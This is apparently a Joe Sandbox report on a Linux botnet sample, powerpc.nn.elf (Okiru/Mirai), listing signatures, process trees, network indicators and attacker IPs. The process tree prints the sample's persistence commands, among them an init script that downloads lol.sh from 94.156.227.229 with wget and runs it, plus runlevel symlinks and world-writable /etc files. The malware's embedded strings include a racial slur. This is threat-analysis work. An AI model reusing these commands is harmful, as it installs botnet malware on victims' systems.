Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
powerpc.nn.elf

Overview

General Information

Sample name:powerpc.nn.elf
Analysis ID:1581262
MD5:27556d2513e616e4e82a3c0f316bf211
SHA1:ccf04ec9ee1f0e89f3bf22ef622413cfb234eb07
SHA256:d16abea205781840fd8919c949b3723df682ea58c0caadfa5f138d4aa1d25f09
Tags:elfuser-abuse_ch
Infos:

Detection

Okiru
Score:84
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Okiru
Drops files in suspicious directories
Sample deletes itself
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1581262
Start date and time:2024-12-27 09:13:13 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 46s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:powerpc.nn.elf
Detection:MAL
Classification:mal84.spre.troj.evad.linELF@0/10@0/0
  • VT rate limit hit for: http://94.156.227.229/
  • VT rate limit hit for: http://94.156.227.229/lol.sh
  • VT rate limit hit for: http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
Command:/tmp/powerpc.nn.elf
PID:6206
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
The Gorilla Botnet Cats Came After You!
Standard Error:
  • system is lnxubuntu20
  • dash New Fork (PID: 6186, Parent: 4331)
  • rm (PID: 6186, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.NYOJJEu7mM /tmp/tmp.D8D2Wtz1Eh /tmp/tmp.qqFC7OmFvK
  • dash New Fork (PID: 6187, Parent: 4331)
  • rm (PID: 6187, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.NYOJJEu7mM /tmp/tmp.D8D2Wtz1Eh /tmp/tmp.qqFC7OmFvK
  • powerpc.nn.elf (PID: 6206, Parent: 6123, MD5: ae65271c943d3451b7f026d1fadccea6) Arguments: /tmp/powerpc.nn.elf
    • sh (PID: 6222, Parent: 6206, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"
      • sh New Fork (PID: 6234, Parent: 6222)
      • systemctl (PID: 6234, Parent: 6222, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service
    • sh (PID: 6259, Parent: 6206, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
      • sh New Fork (PID: 6261, Parent: 6259)
      • chmod (PID: 6261, Parent: 6259, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system
    • sh (PID: 6262, Parent: 6206, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
      • sh New Fork (PID: 6266, Parent: 6262)
      • ln (PID: 6266, Parent: 6262, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system
    • sh (PID: 6267, Parent: 6206, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/powerpc.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting powerpc.nn.elf'\n /tmp/powerpc.nn.elf &\n wget http://94.156.227.229/lol.sh -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping powerpc.nn.elf'\n killall powerpc.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/powerpc.nn.elf"
    • sh (PID: 6269, Parent: 6206, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/powerpc.nn.elf >/dev/null 2>&1"
      • sh New Fork (PID: 6271, Parent: 6269)
      • chmod (PID: 6271, Parent: 6269, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/powerpc.nn.elf
    • sh (PID: 6272, Parent: 6206, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
      • sh New Fork (PID: 6274, Parent: 6272)
      • mkdir (PID: 6274, Parent: 6272, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d
    • sh (PID: 6275, Parent: 6206, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/powerpc.nn.elf /etc/rc.d/S99powerpc.nn.elf >/dev/null 2>&1"
      • sh New Fork (PID: 6280, Parent: 6275)
      • ln (PID: 6280, Parent: 6275, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/powerpc.nn.elf /etc/rc.d/S99powerpc.nn.elf
  • udisksd New Fork (PID: 6217, Parent: 799)
  • dumpe2fs (PID: 6217, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • systemd New Fork (PID: 6247, Parent: 6246)
  • snapd-env-generator (PID: 6247, Parent: 6246, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • udisksd New Fork (PID: 6296, Parent: 799)
  • dumpe2fs (PID: 6296, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6347, Parent: 799)
  • dumpe2fs (PID: 6347, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6348, Parent: 799)
  • dumpe2fs (PID: 6348, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • cleanup
SourceRuleDescriptionAuthorStrings
powerpc.nn.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    SourceRuleDescriptionAuthorStrings
    6206.1.00007fcde4001000.00007fcde4017000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
      Process Memory Space: powerpc.nn.elf PID: 6206JoeSecurity_OkiruYara detected OkiruJoe Security
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: powerpc.nn.elfAvira: detected
        Source: powerpc.nn.elfReversingLabs: Detection: 26%
        Source: powerpc.nn.elfString: getinfo xxxTSource Engine QueryNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/...%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmptmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/ping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt/bin/loginnfstftpftpmalloc[start_pid_hopping] Failed to clone: %s
        Source: global trafficTCP traffic: 192.168.2.23:60004 -> 94.156.227.234:38242
        Source: /tmp/powerpc.nn.elf (PID: 6206)Socket: 0.0.0.0:38242Jump to behavior
        Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
        Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
        Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: powerpc.nn.elfString found in binary or memory: http://94.156.227.229/
        Source: system.16.dr, inittab.16.dr, powerpc.nn.elf.36.dr, profile.16.dr, custom.service.16.dr, bootcmd.16.drString found in binary or memory: http://94.156.227.229/lol.sh
        Source: powerpc.nn.elfString found in binary or memory: http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
        Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
        Source: Initial sampleString containing 'busybox' found: /bin/busybox
        Source: Initial sampleString containing 'busybox' found: getinfo xxxTSource Engine QueryNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/...%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmptmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVR
        Source: ELF static info symbol of initial sample.symtab present: no
        Source: classification engineClassification label: mal84.spre.troj.evad.linELF@0/10@0/0

        Persistence and Installation Behavior

        barindex
        Source: /tmp/powerpc.nn.elf (PID: 6206)File: /etc/profileJump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6206)File: /etc/rc.localJump to behavior
        Source: /usr/bin/ln (PID: 6266)File: /etc/rcS.d/S99system -> /etc/init.d/systemJump to behavior
        Source: /usr/bin/ln (PID: 6280)File: /etc/rc.d/S99powerpc.nn.elf -> /etc/init.d/powerpc.nn.elfJump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6206)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /usr/bin/chmod (PID: 6261)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /usr/bin/chmod (PID: 6271)File: /etc/init.d/powerpc.nn.elf (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6283)File opened: /proc/6384/statusJump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6283)File opened: /proc/6383/statusJump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6283)File opened: /proc/6034/cmdlineJump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6283)File opened: /proc/6364/statusJump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6283)File opened: /proc/6363/statusJump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6283)File opened: /proc/6385/statusJump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6283)File opened: /proc/6366/statusJump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6283)File opened: /proc/6377/statusJump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6283)File opened: /proc/6365/statusJump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6283)File opened: /proc/6376/statusJump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6283)File opened: /proc/6368/statusJump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6283)File opened: /proc/6379/statusJump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6283)File opened: /proc/6367/statusJump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6283)File opened: /proc/6378/statusJump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6283)File opened: /proc/6380/statusJump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6283)File opened: /proc/6382/statusJump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6283)File opened: /proc/6381/statusJump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6283)File opened: /proc/799/cmdlineJump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6283)File opened: /proc/6348/statusJump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6283)File opened: /proc/6347/statusJump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6222)Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"Jump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6259)Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"Jump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6262)Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"Jump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6267)Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/powerpc.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting powerpc.nn.elf'\n /tmp/powerpc.nn.elf &\n wget http://94.156.227.229/lol.sh -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping powerpc.nn.elf'\n killall powerpc.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/powerpc.nn.elf"Jump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6269)Shell command executed: sh -c "chmod +x /etc/init.d/powerpc.nn.elf >/dev/null 2>&1"Jump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6272)Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"Jump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6275)Shell command executed: sh -c "ln -s /etc/init.d/powerpc.nn.elf /etc/rc.d/S99powerpc.nn.elf >/dev/null 2>&1"Jump to behavior
        Source: /bin/sh (PID: 6261)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/systemJump to behavior
        Source: /bin/sh (PID: 6271)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/powerpc.nn.elfJump to behavior
        Source: /bin/sh (PID: 6274)Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.dJump to behavior
        Source: /usr/bin/dash (PID: 6186)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.NYOJJEu7mM /tmp/tmp.D8D2Wtz1Eh /tmp/tmp.qqFC7OmFvKJump to behavior
        Source: /usr/bin/dash (PID: 6187)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.NYOJJEu7mM /tmp/tmp.D8D2Wtz1Eh /tmp/tmp.qqFC7OmFvKJump to behavior
        Source: /bin/sh (PID: 6234)Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.serviceJump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6206)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /usr/bin/chmod (PID: 6261)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /usr/bin/chmod (PID: 6271)File: /etc/init.d/powerpc.nn.elf (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6206)Writes shell script file to disk with an unusual file extension: /etc/init.d/systemJump to dropped file
        Source: /tmp/powerpc.nn.elf (PID: 6206)Writes shell script file to disk with an unusual file extension: /etc/rc.localJump to dropped file
        Source: /bin/sh (PID: 6267)Writes shell script file to disk with an unusual file extension: /etc/init.d/powerpc.nn.elfJump to dropped file

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: /tmp/powerpc.nn.elf (PID: 6206)File: /etc/init.d/systemJump to dropped file
        Source: /bin/sh (PID: 6267)File: /etc/init.d/powerpc.nn.elfJump to dropped file
        Source: /tmp/powerpc.nn.elf (PID: 6285)File: /tmp/powerpc.nn.elfJump to behavior
        Source: /tmp/powerpc.nn.elf (PID: 6206)Queries kernel information via 'uname': Jump to behavior
        Source: powerpc.nn.elf, 6206.1.00007ffd97b8b000.00007ffd97bac000.rw-.sdmpBinary or memory string: U/tmp/qemu-open.b58Zav\
        Source: powerpc.nn.elf, 6206.1.00007ffd97b8b000.00007ffd97bac000.rw-.sdmpBinary or memory string: /tmp/qemu-open.b58Zav
        Source: powerpc.nn.elf, 6206.1.000055f48223b000.000055f4822eb000.rw-.sdmpBinary or memory string: !/proc/2018/exe0!/usr/bin/vmtoolsd1\
        Source: powerpc.nn.elf, 6206.1.000055f48223b000.000055f4822eb000.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsd
        Source: powerpc.nn.elf, 6206.1.000055f48223b000.000055f4822eb000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/ppc
        Source: powerpc.nn.elf, 6206.1.00007ffd97b8b000.00007ffd97bac000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc
        Source: powerpc.nn.elf, 6206.1.00007ffd97b8b000.00007ffd97bac000.rw-.sdmpBinary or memory string: %s/qemu-op
        Source: powerpc.nn.elf, 6206.1.00007ffd97b8b000.00007ffd97bac000.rw-.sdmpBinary or memory string: 2x86_64/usr/bin/qemu-ppc/tmp/powerpc.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/powerpc.nn.elf
        Source: powerpc.nn.elf, 6206.1.000055f48223b000.000055f4822eb000.rw-.sdmpBinary or memory string: !/etc/qemu-binfmt/ppc1/usr/lib/udisks2/udisksd1/proc/112/exe/ppc/X
        Source: powerpc.nn.elf, 6206.1.00007ffd97b8b000.00007ffd97bac000.rw-.sdmpBinary or memory string: MPDIR%s/qemu-op

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: powerpc.nn.elf, type: SAMPLE
        Source: Yara matchFile source: 6206.1.00007fcde4001000.00007fcde4017000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: powerpc.nn.elf PID: 6206, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: powerpc.nn.elf, type: SAMPLE
        Source: Yara matchFile source: 6206.1.00007fcde4001000.00007fcde4017000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: powerpc.nn.elf PID: 6206, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information2
        Scripting
        Valid AccountsWindows Management Instrumentation1
        Unix Shell Configuration Modification
        1
        Unix Shell Configuration Modification
        1
        Masquerading
        1
        OS Credential Dumping
        11
        Security Software Discovery
        Remote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network Medium1
        Data Manipulation
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        Systemd Service
        1
        Systemd Service
        2
        File and Directory Permissions Modification
        LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
        Non-Standard Port
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAt2
        Scripting
        Logon Script (Windows)11
        File Deletion
        Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581262 Sample: powerpc.nn.elf Startdate: 27/12/2024 Architecture: LINUX Score: 84 51 94.156.227.234, 38242, 60004, 60006 NETIXBG Bulgaria 2->51 53 109.202.202.202, 80 INIT7CH Switzerland 2->53 55 2 other IPs or domains 2->55 57 Antivirus / Scanner detection for submitted sample 2->57 59 Multi AV Scanner detection for submitted file 2->59 61 Yara detected Okiru 2->61 8 dash rm powerpc.nn.elf 2->8         started        12 udisksd dumpe2fs 2->12         started        14 udisksd dumpe2fs 2->14         started        16 4 other processes 2->16 signatures3 process4 file5 43 /etc/rc.local, POSIX 8->43 dropped 45 /etc/profile, ASCII 8->45 dropped 47 /etc/init.d/system, POSIX 8->47 dropped 63 Sample tries to set files in /etc globally writable 8->63 65 Sample tries to persist itself using /etc/profile 8->65 67 Drops files in suspicious directories 8->67 69 Sample tries to persist itself using System V runlevels 8->69 18 powerpc.nn.elf sh 8->18         started        20 powerpc.nn.elf sh 8->20         started        22 powerpc.nn.elf sh 8->22         started        24 5 other processes 8->24 signatures6 process7 file8 28 sh chmod 18->28         started        31 sh ln 20->31         started        33 sh chmod 22->33         started        49 /etc/init.d/powerpc.nn.elf, POSIX 24->49 dropped 71 Drops files in suspicious directories 24->71 35 sh ln 24->35         started        37 powerpc.nn.elf 24->37         started        39 sh systemctl 24->39         started        41 2 other processes 24->41 signatures9 process10 signatures11 73 Sample tries to set files in /etc globally writable 28->73 75 Sample tries to persist itself using System V runlevels 31->75 77 Sample deletes itself 37->77

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        powerpc.nn.elf26%ReversingLabsLinux.Backdoor.Mirai
        powerpc.nn.elf100%AviraEXP/ELF.Mirai.W
        SourceDetectionScannerLabelLink
        /etc/rc.local0%ReversingLabs
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://94.156.227.229/0%Avira URL Cloudsafe
        http://94.156.227.229/lol.sh100%Avira URL Cloudmalware
        http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s0%Avira URL Cloudsafe
        No contacted domains info
        NameSourceMaliciousAntivirus DetectionReputation
        http://94.156.227.229/powerpc.nn.elffalse
        • Avira URL Cloud: safe
        unknown
        http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/spowerpc.nn.elffalse
        • Avira URL Cloud: safe
        unknown
        http://94.156.227.229/lol.shsystem.16.dr, inittab.16.dr, powerpc.nn.elf.36.dr, profile.16.dr, custom.service.16.dr, bootcmd.16.drfalse
        • Avira URL Cloud: malware
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        109.202.202.202
        unknownSwitzerland
        13030INIT7CHfalse
        94.156.227.234
        unknownBulgaria
        57463NETIXBGfalse
        91.189.91.43
        unknownUnited Kingdom
        41231CANONICAL-ASGBfalse
        91.189.91.42
        unknownUnited Kingdom
        41231CANONICAL-ASGBfalse
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
        • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
        94.156.227.234x86_64.nn.elfGet hashmaliciousOkiruBrowse
          x86_32.nn.elfGet hashmaliciousOkiruBrowse
            mipsel.nn.elfGet hashmaliciousOkiruBrowse
              powerpc.nn.elfGet hashmaliciousOkiruBrowse
                sparc.nn.elfGet hashmaliciousOkiruBrowse
                  arm7.nn-20241224-0652.elfGet hashmaliciousMirai, OkiruBrowse
                    arm.nn-20241224-0652.elfGet hashmaliciousOkiruBrowse
